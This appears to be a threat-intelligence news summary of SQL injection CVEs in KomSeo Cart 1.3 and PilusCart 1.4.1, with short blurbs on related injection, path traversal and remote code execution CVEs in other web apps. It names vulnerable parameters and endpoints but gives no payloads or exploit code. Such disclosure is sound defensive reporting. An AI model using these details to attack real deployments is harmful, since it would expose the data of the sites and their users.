SQL Injection Flaws Disclosed in KomSeo Cart and PilusCart
Two SQL injection vulnerabilities have been disclosed in legacy shopping cart software, affecting KomSeo Cart 1.3 and PilusCart 1.4.1. The KomSeo Cart issue, tracked as CVE-2018-25206, affects the my_item_search parameter in edit.php, where crafted POST requests can trigger boolean-based blind or error-based SQL injection and expose sensitive database contents. The PilusCart flaw, tracked as CVE-2019-25672, affects the send parameter in a comment submission endpoint and allows unauthenticated attackers to perform RLIKE-based boolean SQL injection through POST requests.
Both CVEs are classified as CWE-89: Improper Neutralization of Special Elements used in an SQL Command and were published with CVSS v3.1 and CVSS v4.0 scoring metadata. The records link to public references including Exploit-DB, VulnCheck, and project or vendor-related sources, indicating that exploit details and technical validation are available. Organizations still running either cart platform should treat the flaws as database-compromise risks because successful exploitation could allow attackers to extract sensitive information without authentication.
Timeline
Apr 5, 2026
CVE-2019-25672 recorded for PilusCart 1.4.1 SQL injection
A CVE entry documented an unauthenticated SQL injection vulnerability in PilusCart 1.4.1 via the 'send' parameter in the comment submission endpoint. The issue enables RLIKE-based boolean SQL injection through POST requests and could be used to extract sensitive database information.
Mar 26, 2026
CVE-2018-25206 recorded for KomSeo Cart 1.3 SQL injection
A CVE entry for an SQL injection vulnerability in KomSeo Cart 1.3 was recorded, affecting the 'my_item_search' parameter in edit.php. The flaw allows crafted POST requests to trigger boolean-based blind or error-based SQL injection and extract sensitive database information.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Sources
Related Stories
Unauthenticated SQL Injection Flaws Expose Data in CMSsite and XATABoost CMS
Two content management systems were identified with **unauthenticated SQL injection** vulnerabilities that allow remote attackers to tamper with backend database queries and extract sensitive information. `CVE-2019-25697` affects **CMSsite 1.0**, where the `cat_id` parameter in `category.php` can be abused through crafted `GET` requests, potentially exposing usernames, credentials, and other database contents. A separate flaw, `CVE-2018-25300`, affects **XATABoost CMS 1.0.0** through a **union-based SQL injection** in the `id` parameter of `news.php`, also reachable remotely without authentication via crafted `GET` requests. Both records were published with **CWE-89** classification, CVSS v3.1 and v4.0 scoring data, and references to public advisories and exploit resources, underscoring the risk of database compromise in internet-exposed deployments.
3 days ago
Critical File Write and RCE Flaws Disclosed in Shopizer, JeeSite, and Krayin CRM
Newly published CVEs detail severe application-layer vulnerabilities in three widely used web platforms. **Shopizer 3.2.5** is affected by `CVE-2026-36767`, a critical path traversal flaw in the `/content/images/add` endpoint that lets an unauthenticated attacker send a crafted POST request and write arbitrary files to any writable path. **JeeSite 5.15.1** is affected by `CVE-2026-36760`, where the `fileMd5` parameter in `/a/file/upload` can be abused during chunked uploads to traverse directories and write arbitrary files with whitelisted suffixes to attacker-chosen filesystem locations; exploitation requires authenticated access with file upload permissions. A separate high-severity issue, `CVE-2026-36340`, affects **Krayin CRM 2.1.5** and allows remote code execution through the compose email function. The flaw was classified as `CWE-94` and has been fixed in **Krayin CRM 2.1.6**. The Shopizer and JeeSite bugs were both classified as `CWE-22` and carry high-impact CVSS ratings reflecting serious risk to confidentiality and integrity, with Shopizer also exposing availability. Public references for all three issues were added alongside their CVE records, including linked GitHub documentation and issue reports describing the vulnerabilities.
2 days ago
SQL Injection Flaws Expose SourceCodester and CodeAstro Management Apps
MITRE has published two high-severity SQL injection vulnerabilities affecting widely available PHP-based management applications: **SourceCodester Payroll Management and Information System v1.0** and **CodeAstro Simple Attendance Management System v1.0**. The SourceCodester issue, tracked as `CVE-2026-37347`, affects `/payroll/view_employee.php` and is classified as `CWE-89`; its CVSS v3.1 vector `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N` indicates remote exploitation with no privileges or user interaction required, with high impact to confidentiality and integrity. The CodeAstro flaw, `CVE-2026-37749`, is also a `CWE-89` SQL injection bug and affects `index.php`, where the `username` parameter can be abused by remote, unauthenticated attackers to bypass authentication. Its CVSS v3.1 vector `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` reflects high impact across confidentiality, integrity, and availability. Both CVE entries were updated with severity details and public references, including GitHub documentation, underscoring the exposure of internet-reachable administrative and employee-management functions to straightforward injection attacks.
2 weeks ago